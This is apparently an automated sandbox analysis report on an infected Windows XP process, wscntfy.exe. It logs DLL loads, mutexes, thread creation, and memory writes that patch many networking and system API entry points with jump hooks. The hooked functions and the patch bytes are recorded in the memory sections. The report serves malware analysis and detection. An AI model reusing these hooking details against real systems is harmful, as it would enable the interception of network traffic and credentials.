Desktop HWND Parent HWND Enum Children TID Window Handles Completion Count Source Address
0 0 false 50C 1, 902b0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2 1001E31
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2640077778
Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2640084525
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2640089284
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2640093139
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2640094123
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2640094752
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2640098512
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2640098815
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2640099939
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2640108227
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2640113649
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2640119327
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2640136898
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2640137962
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2640156006
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid object name not found 2640168384
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2640171783
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2640178151
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2640193597
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2640197273
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid success or wait 2640201268
Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid object name not found 2640207995
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2640209192
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2640220418
Section loaded Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 2640230247
Section loaded Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2640231437
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2640241214
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2640245971
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2640258521
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2640273353
Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2640282439
Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 2640285804
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2640299891
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2640323957
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2640326069
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2640330131
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1010000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2640513950
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2640556111
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2640558252
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2640579232
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2640590868
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2640592805
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2640629220
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2640647831
Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 2640671827
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2640807121
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid success or wait 2640809213
Section loaded Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid object name exists 2640842755
Section loaded Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 8C0000 Size: 262144 Protection: read write Mapped to pid: own pid success or wait 2640854854
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 50C HWNDs: 1, 902b0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2641278240
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 50C HWNDs: 1, 902b0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2641281209
+ Sections
+ General
Start time: 05:44:44
Start date: 08/12/2011
Path: C:\WINDOWS\system32\wscntfy.exe
Commandline: C:\WINDOWS\system32\wscntfy.exe
Imagebase: 0x1000000
File size: 13824 bytes
MD5 hash: F92E1076C42FCD6DB3D72D8CFE9816D5
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 AFA4FF
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
unknown query and write and read commit CB0000 12288 own pid read write success or wait 1
unknown query and write and read commit CB0000 12288 own pid read write success or wait 1
unknown query and write and read commit CB0000 12288 own pid read write success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit DA0000 401408 own pid execute success or wait 1
\KnownDlls\CLBCATQ.DLL write and read and execute unknown DA0000 401408 own pid execute object name not found 1
C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
\KnownDlls\COMRes.dll write and read and execute unknown 76FD0000 520192 own pid read write object name not found 1
C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
C:\WINDOWS\system32\msoeacct.dll write and read and execute commit DA0000 253952 own pid execute success or wait 1
C:\WINDOWS\system32\msoeacct.dll write and read and execute commit DA0000 253952 own pid execute success or wait 1
C:\WINDOWS\system32\msoeacct.dll query and write and read and execute image 68810000 270336 own pid read write success or wait 1
\KnownDlls\MSOERT2.dll write and read and execute unknown 68810000 270336 own pid read write object name not found 1
C:\WINDOWS\system32\msoert2.dll query and write and read and execute image 76880000 139264 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit DA0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit DA0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit DA0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit DC0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit DC0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit DC0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\acctres.dll write and read and execute commit DC0000 65536 own pid execute success or wait 1
C:\WINDOWS\system32\acctres.dll write and read and execute commit DC0000 65536 own pid execute success or wait 1
C:\WINDOWS\system32\acctres.dll query and write and read and execute image 71780000 73728 own pid read write success or wait 1
C:\Program Files\Common Files\System\wab32.dll write and read and execute commit DE0000 512000 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32.dll write and read and execute commit DE0000 512000 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32.dll query and write and read and execute image 470D0000 528384 own pid read write success or wait 1
C:\Program Files\Common Files\System\wab32res.dll write and read and execute commit DE0000 249856 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32res.dll write and read and execute commit DE0000 249856 own pid execute success or wait 1
C:\Program Files\Common Files\System\wab32res.dll query and write and read and execute image 35F40000 258048 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WS2_32.dll write and read and execute unknown 8C0000 262144 own pid read write object name not found 1 AF4018
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 AF4018
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 AF4018
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 AF4018
\KnownDlls\CRYPT32.dll write and read and execute unknown 77A80000 610304 own pid read write success or wait 1 AF4018
\KnownDlls\MSASN1.dll write and read and execute unknown 77B20000 73728 own pid read write success or wait 1 AF4018
\KnownDlls\WININET.dll write and read and execute unknown 771B0000 696320 own pid read write success or wait 1 AF4018
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1 AF4018
C:\WINDOWS\system32\wininet.dll read commit C20000 667648 own pid readonly success or wait 1 AF4018
\KnownDlls\NETAPI32.dll write and read and execute unknown 5B860000 348160 own pid read write success or wait 1 AF4018
Registry Activities:
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Enabled object name not found 1 AE5EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters EnabledV8 success or wait 1 AE5EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 AE5FBA
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters CleanCookies success or wait 1 AE5EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1406 success or wait 5 AE5EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 1609 success or wait 5 AE5EB7
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 15807505 success or wait 1 AE5F47
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters 15807505 success or wait 1 AE5F7A
HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Internet Account Manager\Accounts NULL success or wait 1 AE5EB7
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\Local\{FA8F3AD4-84A8-4B6A-FB56-FD56EA1DDE44} object name exists 1 AFA811
\BaseNamedObjects\Local\{FA8F3AD5-84A9-4B6A-FB56-FD56EA1DDE44} object name exists 1 AFA811
\BaseNamedObjects\Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44} success or wait 1 B00DFC
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
1748 1860 7C8106F9 false C:\WINDOWS\system32\wscntfy.exe success or wait 1 AF8106
1636 1860 7C8106F9 false C:\WINDOWS\system32\wscntfy.exe success or wait 1 AF8106
1768 1860 7C8106F9 false C:\WINDOWS\system32\wscntfy.exe success or wait 1 AF8106
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
1860 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 77212EBC 30 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771C60A1 30 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771CE9C1 30 8B FF 55 8B EC 83 EC 14 53 56 33 C0 57 33 D2 33 DB 33 FF 33 C9 39 55 08 89 45 F8 89 45 EC success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 77212FC1 30 8B FF 55 8B EC 53 56 57 33 DB 33 C0 33 C9 33 D2 33 FF 39 5D 10 75 39 8B 75 0C 85 F6 74 21 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771C4D8C 30 8B FF 55 8B EC 51 51 53 56 33 DB 33 F6 F6 05 94 BD 23 77 01 89 5D FC 0F 84 BA 7E 00 00 39 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771C82EA 30 8B FF 55 8B EC 83 EC 24 53 33 DB 39 1D 8C B8 23 77 57 89 5D F4 89 5D F8 89 5D F0 C7 45 E8 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771F9100 30 8B FF 55 8B EC 83 EC 20 53 56 33 C0 57 33 FF 40 39 3D 8C B8 23 77 89 7D FC 89 7D F8 89 45 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771D89F7 30 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D 8C B8 23 77 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771C79C2 30 6A 2C 68 10 7B 1C 77 E8 A7 9C FE FF 33 DB 89 5D DC 89 5D E4 39 1D 8C B8 23 77 0F 84 E8 95 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771F9C53 30 8B FF 55 8B EC 6A 01 FF 75 0C FF 75 08 E8 1A F4 FD FF 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771D9064 30 8B FF 55 8B EC 6A 00 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 08 00 90 90 90 90 90 8B FF 55 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 771BB1D8 30 8B FF 55 8B EC 83 EC 48 53 8B 5D 10 56 33 F6 39 75 14 57 8B 7D 0C C7 45 F4 01 00 00 00 89 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 71AB3E2B 30 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 71AB4C27 30 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 71AB68FA 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 71AB676F 30 8B FF 55 8B EC 83 EC 10 53 33 DB 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 5E 4A 00 00 8D 45 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 71AB4CB5 30 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 80 65 00 00 8D 45 F8 50 E8 DD success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E41ECA3 30 B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E41FE6E 30 B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E428D20 30 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E42C17E 30 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E423D3A 30 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E43E577 30 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E430833 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E44F965 30 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E430A47 30 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E44F9B4 30 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1 AFF078
1860 C:\WINDOWS\system32\wscntfy.exe 7E42A01E 30 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1 AFF078
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
1860 C:\WINDOWS\system32\wscntfy.exe CA0000 10 B8 35 00 00 00 E9 A9 D1 C6 7B success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 5 E9 A4 AE 1E 84 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA000A 10 68 6C 02 00 00 E9 1E 63 C7 7B success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 7C91632D 5 E9 09 1F 1E 84 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA0014 10 8B FF 55 8B EC E9 A3 2E 57 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 77212EBC 5 E9 FD 4B 8D 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA001E 10 8B FF 55 8B EC E9 7E 60 52 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771C60A1 5 E9 6F 1A 92 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA0028 10 8B FF 55 8B EC E9 94 E9 52 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771CE9C1 5 E9 A6 91 91 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA0032 10 8B FF 55 8B EC E9 8A 2F 57 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 77212FC1 5 E9 4B 4C 8D 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA003C 10 8B FF 55 8B EC E9 4B 4D 52 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771C4D8C 5 E9 25 2F 92 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA0046 10 8B FF 55 8B EC E9 9F 82 52 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771C82EA 5 E9 0A FA 91 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA0050 10 8B FF 55 8B EC E9 AB 90 55 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771F9100 5 E9 34 EC 8E 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA005A 10 8B FF 55 8B EC E9 98 89 53 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771D89F7 5 E9 8B F3 90 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA0064 12 6A 2C 68 10 7B 1C 77 E9 59 79 52 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771C79C2 5 E9 F0 03 92 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA0070 10 8B FF 55 8B EC E9 DE 9B 55 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771F9C53 5 E9 B4 E1 8E 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA007A 10 8B FF 55 8B EC E9 E5 8F 53 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771D9064 5 E9 BB ED 90 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA0084 10 8B FF 55 8B EC E9 4F B1 51 76 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 771BB1D8 5 E9 5F CC 92 89 success or wait 1 AFF11A
1860 C:\WINDOWS\system32\wscntfy.exe CA008E 10 8B FF 55 8B EC E9 98 3D E1 70 success or wait 1 AFF0EC
1860 C:\WINDOWS\system32\wscntfy.exe 71AB3E2B 5 E9 3E E9 03 8F success or wait 1 AFF11A
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
1860 C:\WINDOWS\system32\wscntfy.exe C20000 C1F8C8 page read and write success or wait 1 AFA5EB
1860 C:\WINDOWS\system32\wscntfy.exe C20000 C1F8CC page read and write success or wait 1 AFA5EB
1860 C:\WINDOWS\system32\wscntfy.exe CA0000 C1F4C0 page execute and read and write success or wait 1 B03FCB
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1860 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 77212EBC 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 77212EBC 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771C60A1 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771C60A1 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771CE9C1 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771CE9C1 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 77212FC1 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 77212FC1 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771C4D8C 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771C4D8C 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771C82EA 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771C82EA 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771F9100 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771F9100 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771D89F7 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771D89F7 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771C79C2 1000 page execute and read and write page execute read success or wait 1 AFF04F
1860 C:\WINDOWS\system32\wscntfy.exe 771C79C2 1000 page execute read page execute and read and write success or wait 1 AFF134
1860 C:\WINDOWS\system32\wscntfy.exe 771F9C53 1000 page execute and read and write page execute read success or wait 1 AFF04F
